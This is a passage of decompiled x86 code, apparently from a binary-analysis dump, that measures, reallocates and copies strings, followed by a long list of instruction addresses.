																	asm("pmovmskb edx, xmm0");
																	__eflags = _t363;
																	if(_t363 != 0) {
																		break;
																	}
																	_t229 = _t229 + 0x10;
																	__eflags = _t229 - _t422;
																	if(_t229 < _t422) {
																		continue;
																	} else {
																		__eflags = _t422 - 0x7fffffff;
																		if(_t422 >= 0x7fffffff) {
																			L53:
																			_t422 = 0x7fffffff;
																		} else {
																			_t363 = _a8;
																			while(1) {
																				__eflags =  *((char*)(_t422 + _t363));
																				if( *((char*)(_t422 + _t363)) == 0) {
																					goto L54;
																				}
																				_t422 = _t422 + 1;
																				__eflags = _t422 - 0x7fffffff;
																				if(_t422 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L53;
																				}
																				goto L54;
																			}
																		}
																	}
																	goto L54;
																}
																asm("bsf esi, edx");
																_t422 = _t422 + _t229;
															} else {
																_t229 = _v52;
																_t422 = 0;
																__eflags = 0;
																_t324 = _a8;
																_t363 = _t229;
																while(1) {
																	__eflags =  *((char*)(_t422 + _t324));
																	if( *((char*)(_t422 + _t324)) == 0) {
																		break;
																	}
																	_t422 = _t422 + 1;
																	__eflags = _t422 - _t363;
																	if(_t422 < _t363) {
																		continue;
																	} else {
																		_v52 = _t363;
																		goto L46;
																	}
																	goto L54;
																}
																_v52 = _t363;
															}
															L54:
															__eflags = _t284;
															if(_t284 == 0) {
																_t311 = 0;
															} else {
																_t239 = _t284 & 0x0000000f;
																__eflags = _t239;
																if(_t239 == 0) {
																	L59:
																	asm("pxor xmm1, xmm1");
																	_t311 =  ~( ~_t239 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t311;
																	while(1) {
																		asm("movdqu xmm0, [ebx+eax]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edx, xmm0");
																		__eflags = _t363;
																		if(_t363 != 0) {
																			break;
																		}
																		_t239 = _t239 + 0x10;
																		__eflags = _t239 - _t311;
																		if(_t239 < _t311) {
																			continue;
																		} else {
																			__eflags = _t311 - 0x7fffffff;
																			if(_t311 >= 0x7fffffff) {
																				L65:
																				_t311 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t311 + _t284));
																					if( *((char*)(_t311 + _t284)) == 0) {
																						goto L66;
																					}
																					_t311 = _t311 + 1;
																					__eflags = _t311 - 0x7fffffff;
																					if(_t311 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L65;
																					}
																					goto L66;
																				}
																			}
																		}
																		goto L66;
																	}
																	asm("bsf ecx, edx");
																	_t311 = _t311 + _t239;
																} else {
																	_t311 = 0;
																	_t239 =  ~_t239 + 0x10;
																	__eflags = _t239;
																	while(1) {
																		__eflags =  *((char*)(_t311 + _t284));
																		if( *((char*)(_t311 + _t284)) == 0) {
																			goto L66;
																		}
																		_t311 = _t311 + 1;
																		__eflags = _t311 - _t239;
																		if(_t311 < _t239) {
																			continue;
																		} else {
																			goto L59;
																		}
																		goto L66;
																	}
																}
															}
															L66:
															_t55 = _t311 + 1; // 0x80000000
															_t312 = _t422 + _t55;
															__eflags = _t312;
															if(_t312 != 0) {
																__eflags = _t312 - 0x40;
																_t313 =  <=  ? 0x40 : _t312;
																__eflags = _t313 - _v48;
																if(_t313 > _v48) {
																	goto L71;
																}
																goto L83;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L97;
																	} else {
																		goto L213;
																	}
																	goto L225;
																} else {
																	 *_t284 = 0;
																	_t365 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L213:
																		_t313 = 0x40;
																		L71:
																		_t372 = (_t313 >> 5 >> 0x1a) + _t313 >> 6;
																		_v48 = _t372;
																		_t315 = _t313 & 0x8000003f;
																		__eflags = _t315;
																		if(_t315 < 0) {
																			_t315 = (_t315 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t315;
																		}
																		__eflags = _t315;
																		_t374 = _t372 + (0 | _t315 > 0x00000000) << 6;
																		_v48 = _t374;
																		_push(_t374);
																		_t234 = E008A1030();
																		_v68 = _t234;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t234 = 0;
																		} else {
																			__eflags = _v68;
																			if(_v68 != 0) {
																				_t376 = _t234;
																				_t236 =  *_t284;
																				 *_t376 = _t236;
																				__eflags = _t236;
																				if(_t236 != 0) {
																					_v32 = _t400;
																					_t237 = 0;
																					__eflags = 0;
																					_t316 = _t376;
																					while(1) {
																						_t237 = _t237 + 1;
																						_t377 =  *((char*)(_t284 + _t237 * 2 - 1));
																						 *(_t316 + _t237 * 2 - 1) = _t377;
																						__eflags = _t377;
																						if(_t377 == 0) {
																							break;
																						}
																						_t378 =  *((char*)(_t284 + _t237 * 2));
																						 *(_t316 + _t237 * 2) = _t378;
																						__eflags = _t378;
																						if(_t378 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			E008A10B0();
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v68;
																		L83:
																		_t314 = _t284;
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t365 =  *_t284;
																			goto L85;
																		}
																	} else {
																		_t314 = _t284;
																		L85:
																		__eflags = _t365;
																		if(_t365 != 0) {
																			_t367 = 0;
																			__eflags = 0;
																			while(1) {
																				_t367 = _t367 + 1;
																				_t231 = _t284 + _t367 * 2;
																				__eflags =  *(_t231 - 1);
																				_t78 = _t231 - 1; // -1
																				_t314 = _t78;
																				if( *(_t231 - 1) == 0) {
																					goto L89;
																				}
																				_t314 = _t231;
																				__eflags =  *_t231;
																				if( *_t231 != 0) {
																					continue;
																				}
																				goto L89;
																			}
																		}
																		L89:
																		_t366 = _t314;
																		__eflags = _t422;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L92;
																			}
																		} else {
																			_t422 = 0x7fffffff;
																			L92:
																			_v32 = _t400;
																			_t230 = 0;
																			__eflags = 0;
																			_v44 = _t284;
																			_t401 = _a8;
																			while(1) {
																				_t287 =  *((char*)(_t230 + _t401));
																				 *(_t230 + _t366) = _t287;
																				__eflags = _t287;
																				if(_t287 == 0) {
																					break;
																				}
																				_t85 = _t366 + 1; // 0x1
																				_t314 = _t230 + _t85;
																				_t230 = _t230 + 1;
																				__eflags = _t230 - _t422;
																				if(_t230 < _t422) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		 *_t314 = 0;
																	}
																}
															}
														}
													}
												}
												L97:
												_t309 =  *(_v36 + 4);
												_t361 =  *( *(_t309 + _t400 * 4));
												__eflags = _t361;
												if(_t361 == 0) {
													goto L99;
												} else {
													__eflags =  *_t361;
													if( *_t361 != 0) {
														__eflags = _t361 - _t284;
														if(_t361 == _t284) {
															goto L99;
														} else {
															_t225 = _t361 & 0x0000000f;
															__eflags = _t225;
															if(_t225 == 0) {
																L106:
																asm("pxor xmm1, xmm1");
																_t428 =  ~( ~_t225 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t428;
																while(1) {
																	asm("movdqu xmm0, [edx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb ecx, xmm0");
																	__eflags = _t309;
																	if(_t309 != 0) {
																		break;
																	}
																	_t225 = _t225 + 0x10;
																	__eflags = _t225 - _t428;
																	if(_t225 < _t428) {
																		continue;
																	} else {
																		__eflags = _t428 - 0x7fffffff;
																		if(_t428 >= 0x7fffffff) {
																			L112:
																			_t428 = 0x7fffffff;
																		} else {
																			while(1) {
																				__eflags =  *((char*)(_t428 + _t361));
																				if( *((char*)(_t428 + _t361)) == 0) {
																					goto L113;
																				}
																				_t428 = _t428 + 1;
																				__eflags = _t428 - 0x7fffffff;
																				if(_t428 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L112;
																				}
																				goto L113;
																			}
																		}
																	}
																	goto L113;
																}
																asm("bsf esi, ecx");
																_t428 = _t428 + _t225;
															} else {
																_t428 = 0;
																_t225 =  ~_t225 + 0x10;
																__eflags = _t225;
																while(1) {
																	__eflags =  *((char*)(_t428 + _t361));
																	if( *((char*)(_t428 + _t361)) == 0) {
																		goto L113;
																	}
																	_t428 = _t428 + 1;
																	__eflags = _t428 - _t225;
																	if(_t428 < _t225) {
																		continue;
																	} else {
																		goto L106;
																	}
																	goto L113;
																}
															}
															L113:
															__eflags = _t284;
															if(_t284 == 0) {
																_t226 = 0;
															} else {
																_t337 = _t284 & 0x0000000f;
																__eflags = _t337;
																if(_t337 == 0) {
																	L118:
																	asm("pxor xmm1, xmm1");
																	_v32 = _t400;
																	_t226 =  ~( ~_t337 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t226;
																	while(1) {
																		asm("movdqu xmm0, [ebx+ecx]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edi, xmm0");
																		__eflags = _t400;
																		if(_t400 != 0) {
																			break;
																		}
																		_t337 = _t337 + 0x10;
																		__eflags = _t337 - _t226;
																		if(_t337 < _t226) {
																			continue;
																		} else {
																			_t400 = _v32;
																			__eflags = _t226 - 0x7fffffff;
																			if(_t226 >= 0x7fffffff) {
																				L124:
																				_t226 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t226 + _t284));
																					if( *((char*)(_t226 + _t284)) == 0) {
																						goto L125;
																					}
																					_t226 = _t226 + 1;
																					__eflags = _t226 - 0x7fffffff;
																					if(_t226 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		}
																		goto L125;
																	}
																	_t259 = _t400;
																	asm("bsf eax, eax");
																	_t400 = _v32;
																	_t226 = _t259 + _t337;
																} else {
																	_t226 = 0;
																	_t337 =  ~_t337 + 0x10;
																	__eflags = _t337;
																	while(1) {
																		__eflags =  *((char*)(_t226 + _t284));
																		if( *((char*)(_t226 + _t284)) == 0) {
																			goto L125;
																		}
																		_t226 = _t226 + 1;
																		__eflags = _t226 - _t337;
																		if(_t226 < _t337) {
																			continue;
																		} else {
																			goto L118;
																		}
																		goto L125;
																	}
																}
															}
															L125:
															_t100 = _t226 + 1; // 0x80000000
															_t227 = _t428 + _t100;
															__eflags = _t227;
															if(_t227 != 0) {
																__eflags = _t227 - 0x40;
																_t228 =  <=  ? 0x40 : _t227;
																__eflags = _t228 - _v48;
																if(_t228 > _v48) {
																	goto L130;
																}
																goto L142;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L214;
																	} else {
																		goto L224;
																	}
																} else {
																	 *_t284 = 0;
																	_t242 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L224:
																		_t228 = 0x40;
																		L130:
																		_t331 = (_t228 >> 5 >> 0x1a) + _t228 >> 6;
																		_v48 = _t331;
																		_t245 = _t228 & 0x8000003f;
																		__eflags = _t245;
																		if(_t245 < 0) {
																			_t245 = (_t245 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t245;
																		}
																		__eflags = _t245;
																		_t333 = _t331 + (0 | _t245 > 0x00000000) << 6;
																		_v48 = _t333;
																		_push(_t333);
																		_v64 = _t361;
																		_t248 = E008A1030();
																		_t361 = _v64;
																		_v60 = _t248;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t248 = 0;
																		} else {
																			__eflags = _v60;
																			if(_v60 != 0) {
																				_t335 = _t248;
																				_t250 =  *_t284;
																				 *_t335 = _t250;
																				__eflags = _t250;
																				if(_t250 != 0) {
																					_v64 = _t361;
																					_t251 = 0;
																					__eflags = 0;
																					_v32 = _t400;
																					while(1) {
																						_t251 = _t251 + 1;
																						_t383 =  *((char*)(_t284 + _t251 * 2 - 1));
																						 *(_t335 + _t251 * 2 - 1) = _t383;
																						__eflags = _t383;
																						if(_t383 == 0) {
																							break;
																						}
																						_t384 =  *((char*)(_t284 + _t251 * 2));
																						 *(_t335 + _t251 * 2) = _t384;
																						__eflags = _t384;
																						if(_t384 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t361 = _v64;
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			_v64 = _t361;
																			E008A10B0();
																			_t361 = _v64;
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v60;
																		L142:
																		_t326 = _t284;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			goto L214;
																		} else {
																			_t242 =  *_t284;
																			goto L144;
																		}
																	} else {
																		_t326 = _t284;
																		L144:
																		__eflags = _t242;
																		if(_t242 != 0) {
																			_v32 = _t400;
																			_t244 = 0;
																			__eflags = 0;
																			while(1) {
																				_t244 = _t244 + 1;
																				_t403 = _t284 + _t244 * 2;
																				__eflags =  *(_t403 - 1);
																				_t326 = _t403 - 1;
																				if( *(_t403 - 1) == 0) {
																					break;
																				}
																				_t326 = _t403;
																				__eflags =  *_t403;
																				if( *_t403 != 0) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																		}
																		_t243 = _t326;
																		__eflags = _t428;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L152;
																			}
																		} else {
																			_t428 = 0x7fffffff;
																			L152:
																			_v40 = 0;
																			_v32 = _t400;
																			_v44 = _t284;
																			_t402 = _v40;
																			while(1) {
																				_t288 =  *((char*)(_t402 + _t361));
																				 *(_t402 + _t243) = _t288;
																				__eflags = _t288;
																				if(_t288 == 0) {
																					break;
																				}
																				_t141 = _t243 + 1; // 0x1
																				_t326 = _t402 + _t141;
																				_t402 = _t402 + 1;
																				__eflags = _t402 - _t428;
																				if(_t402 < _t428) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		goto L156;
																	}
																}
															}
														}
													} else {
														goto L99;
													}
												}
												goto L200;
												L99:
												_t400 = _t400 + 1;
												__eflags = _t400 -  *_v36;
											} while (_t400 <  *_v36);
											goto L203;
											L214:
											_t400 = _t400 + 1;
											__eflags = _t400 -  *_v36;
										} while (_t400 <  *_v36);
										_t380 = _a4;
										 *_t380 = 0;
										 *((intOrPtr*)(_t380 + 4)) = 0;
										L191:
										_push(0x40);
										_t407 = E008A1030();
										_t439 = _t439 + 4;
										_t206 =  *_a4;
										__eflags = _t206;
										if(_t206 == 0) {
											 *_t407 = 0;
										} else {
											__eflags = _t407;
											if(_t407 != 0) {
												_t345 =  *_t206;
												 *_t407 = _t345;
												__eflags = _t345;
												if(_t345 != 0) {
													_t304 = 0;
													__eflags = 0;
													while(1) {
														_t304 = _t304 + 1;
														_t346 =  *((char*)(_t206 + _t304 * 2 - 1));
														 *(_t407 + _t304 * 2 - 1) = _t346;
														__eflags = _t346;
														if(_t346 == 0) {
															goto L197;
														}
														_t347 =  *((char*)(_t206 + _t304 * 2));
														 *(_t407 + _t304 * 2) = _t347;
														__eflags = _t347;
														if(_t347 != 0) {
															continue;
														}
														goto L197;
													}
												}
											}
											L197:
											_push(1);
											_push(_t206);
											E008A10B0();
											_t439 = _t439 + 8;
										}
										_t207 = _a4;
										 *_t207 = _t407;
										_t207[1] = 0x40;
										goto L200;
										L156:
										_t400 = _t400 + 1;
										 *_t326 = 0;
										__eflags = _t400 -  *_v36;
									} while (_t400 <  *_v36);
									L157:
									_t382 = _a4;
									_t203 = 0;
									__eflags = 0;
									 *_t382 = 0;
									 *((intOrPtr*)(_t382 + 4)) = 0;
									L158:
									__eflags =  *_t284;
									if( *_t284 == 0) {
										goto L191;
									} else {
										_t349 = _t284 & 0x0000000f;
										__eflags = _t349;
										if(_t349 == 0) {
											L163:
											asm("pxor xmm0, xmm0");
											_t414 =  ~( ~_t349 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											__eflags = _t414;
											while(1) {
												asm("movdqu xmm1, [ebx+edx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb eax, xmm1");
												__eflags = _t203;
												if(_t203 != 0) {
													break;
												}
												_t349 = _t349 + 0x10;
												__eflags = _t349 - _t414;
												if(_t349 < _t414) {
													continue;
												} else {
													__eflags = _t414 - 0x7fffffff;
													if(_t414 >= 0x7fffffff) {
														L169:
														_t414 = 0x7fffffff;
													} else {
														while(1) {
															__eflags =  *((char*)(_t414 + _t284));
															if( *((char*)(_t414 + _t284)) == 0) {
																goto L170;
															}
															_t414 = _t414 + 1;
															__eflags = _t414 - 0x7fffffff;
															if(_t414 < 0x7fffffff) {
																continue;
															} else {
																goto L169;
															}
															goto L170;
														}
													}
												}
												goto L170;
											}
											asm("bsf esi, eax");
											_t414 = _t414 + _t349;
										} else {
											_t414 = 0;
											_t349 =  ~_t349 + 0x10;
											__eflags = _t349;
											while(1) {
												__eflags =  *((char*)(_t414 + _t284));
												if( *((char*)(_t414 + _t284)) == 0) {
													goto L170;
												}
												_t414 = _t414 + 1;
												__eflags = _t414 - _t349;
												if(_t414 < _t349) {
													continue;
												} else {
													goto L163;
												}
												goto L170;
											}
										}
										L170:
										_t149 = _t414 + 1; // 0x80000000
										_t350 = _t149;
										__eflags = _t350 - 0x40;
										_t351 =  <=  ? 0x40 : _t350;
										__eflags = _t351;
										if(_t351 > 0) {
											_t396 = (_t351 >> 5 >> 0x1a) + _t351 >> 6;
											_t352 = _t351 & 0x8000003f;
											__eflags = _t352;
											if(_t352 < 0) {
												_t352 = (_t352 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t352;
											}
											__eflags = _t352;
											_t398 = _t396 + (0 | _t352 > 0x00000000) << 6;
											_push(_t398);
											_t353 = E008A1030();
											_t439 = _t439 + 4;
											_t305 =  *_a4;
											__eflags = _t305;
											if(_t305 == 0) {
												 *_t353 = 0;
											} else {
												__eflags = _t353;
												if(_t353 != 0) {
													_t219 =  *_t305;
													 *_t353 = _t219;
													__eflags = _t219;
													if(_t219 != 0) {
														__eflags = 0;
														_v68 = _t414;
														_v44 = _t284;
														_t286 = 0;
														while(1) {
															_t286 = _t286 + 1;
															_t221 =  *((char*)(_t305 + _t286 * 2 - 1));
															 *(_t353 + _t286 * 2 - 1) = _t221;
															__eflags = _t221;
															if(_t221 == 0) {
																break;
															}
															_t222 =  *((char*)(_t305 + _t286 * 2));
															 *(_t353 + _t286 * 2) = _t222;
															__eflags = _t222;
															if(_t222 != 0) {
																continue;
															}
															break;
														}
														_t414 = _v68;
														_t284 = _v44;
													}
												}
												_push(1);
												_push(_t305);
												_v68 = _t353;
												E008A10B0();
												_t353 = _v68;
												_t439 = _t439 + 8;
											}
											_t216 = _a4;
											_t216[1] = _t398;
											 *_t216 = _t353;
										} else {
											_t353 = 0;
										}
										_t306 = _t284;
										__eflags = _t353;
										if(_t353 != 0) {
											_t399 = 0;
											while(1) {
												_t217 =  *_t306;
												_t399 = _t399 + 1;
												 *_t353 = _t217;
												__eflags = _t414;
												if(_t414 == 0) {
													goto L189;
												}
												__eflags = _t399 - _t414;
												if(_t399 == _t414) {
													 *(_t353 + 1) = 0;
												} else {
													goto L189;
												}
												goto L200;
												L189:
												__eflags = _t217;
												if(_t217 != 0) {
													_t353 = _t353 + 1;
													_t306 = _t306 + 1;
													__eflags = _t306;
													continue;
												}
												goto L200;
											}
										}
									}
								}
							}
						}
					}
					L200:
					_push(1);
					_push(_t284);
					E008A10B0();
					return _a4;
				} else {
					_t386 = _a4;
					_push(0x40);
					 *_t386 = 0;
					 *((intOrPtr*)(_t386 + 4)) = 0;
					_t300 = E008A1030();
					_t441 = _t439 + 4;
					_t280 =  *_a4;
					if(_t280 == 0) {
						 *_t300 = 0;
					} else {
						if(_t300 != 0) {
							_t387 =  *_t280;
							 *_t300 = _t387;
							if(_t387 != 0) {
								_t388 = 0;
								while(1) {
									_t388 = _t388 + 1;
									_t340 =  *((char*)(_t280 + _t388 * 2 - 1));
									 *((char*)(_t300 + _t388 * 2 - 1)) = _t340;
									if(_t340 == 0) {
										goto L7;
									}
									_t341 =  *((char*)(_t280 + _t388 * 2));
									 *((char*)(_t300 + _t388 * 2)) = _t341;
									if(_t341 != 0) {
										continue;
									}
									goto L7;
								}
							}
						}
						L7:
						_push(1);
						_push(_t280);
						E008A10B0();
						_t441 = _t441 + 8;
					}
					_t281 = _a4;
					_t281[1] = 0x40;
					 *_t281 = _t300;
					return _t281;
				}
				L225:
			}

0x008b7669
0x008b766c
0x008b766e
0x008b7672
0x008b76e8
0x008b76ea
0x008b76ec
0x008b782b
0x008b782b
0x008b7832
0x008b7834
0x008b7837
0x008b783a
0x008b783d
0x00000000
0x008b7843
0x008b7843
0x00000000
0x008b7843
0x008b76f2
0x008b76f2
0x008b76f5
0x00000000
0x008b76fb
0x008b76fd
0x008b76fd
0x008b7700
0x008b7722
0x008b7726
0x008b7732
0x008b7732
0x008b7738
0x008b773c
0x008b773e
0x008b773e
0x008b7743
0x008b7747
0x008b774b
0x008b774d
0x00000000
0x00000000
0x008b7753
0x008b7756
0x008b7758
0x00000000
0x008b775a
0x008b775a
0x008b775e
0x008b7766
0x008b777c
0x008b777c
0x008b7768
0x008b7768
0x008b776a
0x008b776a
0x008b776e
0x00000000
0x00000000
0x008b7774
0x008b7775
0x008b777a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b777a
0x008b7f0c
0x008b7f0c
0x008b7766
0x00000000
0x008b7758
0x008b7f15
0x008b7f1a
0x008b7702
0x008b7702
0x008b770c
0x008b7710
0x008b7710
0x008b7713
0x008b7713
0x008b7717
0x00000000
0x00000000
0x008b771d
0x008b771e
0x008b7720
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7720
0x008b7f23
0x008b7f23
0x008b7784
0x008b778d
0x008b7790
0x008b7793
0x008b7796
0x008b7798
0x008b77b6
0x008b77b9
0x008b77b9
0x008b77be
0x008b77c6
0x008b77c6
0x008b77c6
0x008b77c7
0x008b77d3
0x008b77d6
0x008b77d7
0x008b77db
0x008b77e0
0x008b77e4
0x008b77e6
0x008b77ed
0x008b77f5
0x008b77f9
0x008b77fd
0x008b7800
0x008b7803
0x008b7807
0x008b780f
0x008b780f
0x008b7812
0x008b7813
0x008b7815
0x008b7817
0x00000000
0x00000000
0x008b7819
0x008b781b
0x008b7ee2
0x008b7ee6
0x008b7ee9
0x008b7eed
0x00000000
0x00000000
0x00000000
0x008b7ef1
0x008b7ef1
0x008b7ef4
0x00000000
0x008b7efa
0x00000000
0x008b7efa
0x00000000
0x008b7821
0x008b7821
0x008b7823
0x008b7eff
0x008b7f03
0x008b7f06
0x008b7829
0x008b780d
0x008b780e
0x008b780e
0x00000000
0x008b780e
0x00000000
0x008b7823
0x008b779a
0x008b779a
0x008b779c
0x008b779f
0x008b7ecb
0x008b7ecb
0x008b7ece
0x008b7ed0
0x008b7ed2
0x008b7ed5
0x008b7ed7
0x00000000
0x008b7edd
0x00000000
0x008b7edd
0x008b77a5
0x008b77a5
0x008b7848
0x008b7850
0x008b7855
0x008b785b
0x008b785b
0x008b785e
0x008b7862
0x008b7866
0x008b786a
0x008b786e
0x008b786e
0x008b7870
0x008b7870
0x008b7870
0x008b7870
0x008b7870
0x008b7874
0x008b787a
0x008b787d
0x008b7880
0x008b7886
0x008b7889
0x008b788f
0x008b7893
0x008b7895
0x008b78b5
0x008b78b9
0x008b78c8
0x008b78c8
0x008b78ce
0x008b78ce
0x008b78d3
0x008b78d7
0x008b78db
0x008b78dd
0x00000000
0x00000000
0x008b78e3
0x008b78e6
0x008b78e8
0x00000000
0x008b78ea
0x008b78ea
0x008b78f0
0x008b7904
0x008b7904
0x008b78f2
0x008b78f2
0x008b78f5
0x008b78f5
0x008b78f9
0x00000000
0x00000000
0x008b78fb
0x008b78fc
0x008b7902
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7902
0x008b78f5
0x008b78f0
0x00000000
0x008b78e8
0x008b7f8f
0x008b7f92
0x008b7897
0x008b7897
0x008b789b
0x008b789b
0x008b789d
0x008b78a0
0x008b78a2
0x008b78a2
0x008b78a6
0x00000000
0x00000000
0x008b78ac
0x008b78ad
0x008b78af
0x00000000
0x008b78b1
0x008b78b1
0x00000000
0x008b78b1
0x00000000
0x008b78af
0x008b7f99
0x008b7f99
0x008b7909
0x008b7909
0x008b790b
0x008b7f88
0x008b7911
0x008b7913
0x008b7913
0x008b7916
0x008b792a
0x008b792e
0x008b793a
0x008b793a
0x008b7940
0x008b7940
0x008b7945
0x008b7949
0x008b794d
0x008b794f
0x00000000
0x00000000
0x008b7955
0x008b7958
0x008b795a
0x00000000
0x008b795c
0x008b795c
0x008b7962
0x008b7973
0x008b7973
0x00000000
0x008b7964
0x008b7964
0x008b7968
0x00000000
0x00000000
0x008b796a
0x008b796b
0x008b7971
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7971
0x008b7964
0x008b7962
0x00000000
0x008b795a
0x008b7f7e
0x008b7f81
0x008b7918
0x008b791a
0x008b791c
0x008b791c
0x008b791f
0x008b791f
0x008b7923
0x00000000
0x00000000
0x008b7925
0x008b7926
0x008b7928
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7928
0x008b791f
0x008b7916
0x008b7978
0x008b7978
0x008b7978
0x008b797c
0x008b797e
0x008b79a4
0x008b79a7
0x008b79aa
0x008b79ae
0x00000000
0x00000000
0x00000000
0x008b7980
0x008b7980
0x008b7982
0x008b7f2c
0x008b7f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7988
0x008b7988
0x008b798b
0x008b798d
0x008b7992
0x008b7f37
0x008b7f37
0x008b79b4
0x008b79be
0x008b79c1
0x008b79c5
0x008b79c5
0x008b79cb
0x008b79d3
0x008b79d3
0x008b79d3
0x008b79d6
0x008b79dd
0x008b79e0
0x008b79e4
0x008b79e5
0x008b79ea
0x008b79ee
0x008b79f1
0x008b79f3
0x008b7a3a
0x008b79f5
0x008b79f5
0x008b79f9
0x008b79fb
0x008b79fd
0x008b7a00
0x008b7a02
0x008b7a04
0x008b7a06
0x008b7a0a
0x008b7a0a
0x008b7a0c
0x008b7a0e
0x008b7a0e
0x008b7a0f
0x008b7a14
0x008b7a18
0x008b7a1a
0x00000000
0x00000000
0x008b7a1c
0x008b7a20
0x008b7a23
0x008b7a25
0x00000000
0x00000000
0x00000000
0x008b7a25
0x008b7a27
0x008b7a27
0x008b7a04
0x008b7a2b
0x008b7a2d
0x008b7a2e
0x008b7a33
0x008b7a33
0x008b7a3d
0x008b7a40
0x008b7a40
0x008b7a42
0x008b7a44
0x008b7a46
0x00000000
0x008b7a46
0x008b7998
0x008b7998
0x008b7a49
0x008b7a49
0x008b7a4b
0x008b7a4d
0x008b7a4d
0x008b7a4f
0x008b7a4f
0x008b7a50
0x008b7a53
0x008b7a57
0x008b7a57
0x008b7a5a
0x00000000
0x00000000
0x008b7a5c
0x008b7a5e
0x008b7a61
0x00000000
0x00000000
0x00000000
0x008b7a61
0x008b7a4f
0x008b7a63
0x008b7a63
0x008b7a65
0x008b7a67
0x008b7a70
0x00000000
0x00000000
0x008b7a69
0x008b7a69
0x008b7a72
0x008b7a72
0x008b7a76
0x008b7a76
0x008b7a78
0x008b7a7c
0x008b7a7f
0x008b7a7f
0x008b7a83
0x008b7a86
0x008b7a88
0x00000000
0x00000000
0x008b7a8a
0x008b7a8a
0x008b7a8e
0x008b7a8f
0x008b7a91
0x00000000
0x00000000
0x00000000
0x008b7a91
0x008b7a93
0x008b7a97
0x008b7a97
0x008b7a9b
0x008b7a9b
0x008b7992
0x008b7982
0x008b797e
0x008b7889
0x008b7880
0x008b7a9e
0x008b7aa2
0x008b7aa8
0x008b7aaa
0x008b7aac
0x00000000
0x008b7aae
0x008b7aae
0x008b7ab1
0x008b7ac5
0x008b7ac7
0x00000000
0x008b7ac9
0x008b7acb
0x008b7acb
0x008b7ace
0x008b7ae2
0x008b7ae6
0x008b7af2
0x008b7af2
0x008b7af8
0x008b7af8
0x008b7afd
0x008b7b01
0x008b7b05
0x008b7b07
0x00000000
0x00000000
0x008b7b0d
0x008b7b10
0x008b7b12
0x00000000
0x008b7b14
0x008b7b14
0x008b7b1a
0x008b7b2b
0x008b7b2b
0x00000000
0x008b7b1c
0x008b7b1c
0x008b7b20
0x00000000
0x00000000
0x008b7b22
0x008b7b23
0x008b7b29
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7b29
0x008b7b1c
0x008b7b1a
0x00000000
0x008b7b12
0x008b7f74
0x008b7f77
0x008b7ad0
0x008b7ad2
0x008b7ad4
0x008b7ad4
0x008b7ad7
0x008b7ad7
0x008b7adb
0x00000000
0x00000000
0x008b7add
0x008b7ade
0x008b7ae0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7ae0
0x008b7ad7
0x008b7b30
0x008b7b30
0x008b7b32
0x008b7f6d
0x008b7b38
0x008b7b3a
0x008b7b3a
0x008b7b3d
0x008b7b51
0x008b7b55
0x008b7b61
0x008b7b65
0x008b7b65
0x008b7b6a
0x008b7b6a
0x008b7b6f
0x008b7b73
0x008b7b77
0x008b7b79
0x00000000
0x00000000
0x008b7b7f
0x008b7b82
0x008b7b84
0x00000000
0x008b7b86
0x008b7b86
0x008b7b8a
0x008b7b8f
0x008b7b9f
0x008b7b9f
0x00000000
0x008b7b91
0x008b7b91
0x008b7b95
0x00000000
0x00000000
0x008b7b97
0x008b7b98
0x008b7b9d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7b9d
0x008b7b91
0x008b7b8f
0x00000000
0x008b7b84
0x008b7f5d
0x008b7f5f
0x008b7f62
0x008b7f66
0x008b7b3f
0x008b7b41
0x008b7b43
0x008b7b43
0x008b7b46
0x008b7b46
0x008b7b4a
0x00000000
0x00000000
